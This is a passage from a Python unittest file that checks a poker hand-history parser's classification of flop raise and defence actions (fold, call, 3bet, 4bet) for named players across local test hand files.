self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a6-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a6-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a6-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
def test_enum_b_raise_def(self):
# folder containing the correct answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'a1-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a1-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('call 2bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a1-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('3bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('3bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('call 2bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('call 2bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('3bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a6-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a6-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a6-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
def test_raise_raise_def_opp(self):
# folder containing the correct answers
folder = f + '/testy/rece/'
file = '__bug4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Mimimimi77'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'b1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b7.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b8.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b9.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b10.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b11.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
def test_enum_raise_raise_def(self):
# folder containing the correct answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'b1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('4bet', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b7.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('call 3bet', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b8.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('call 3bet', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b9.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('4bet', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b10.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
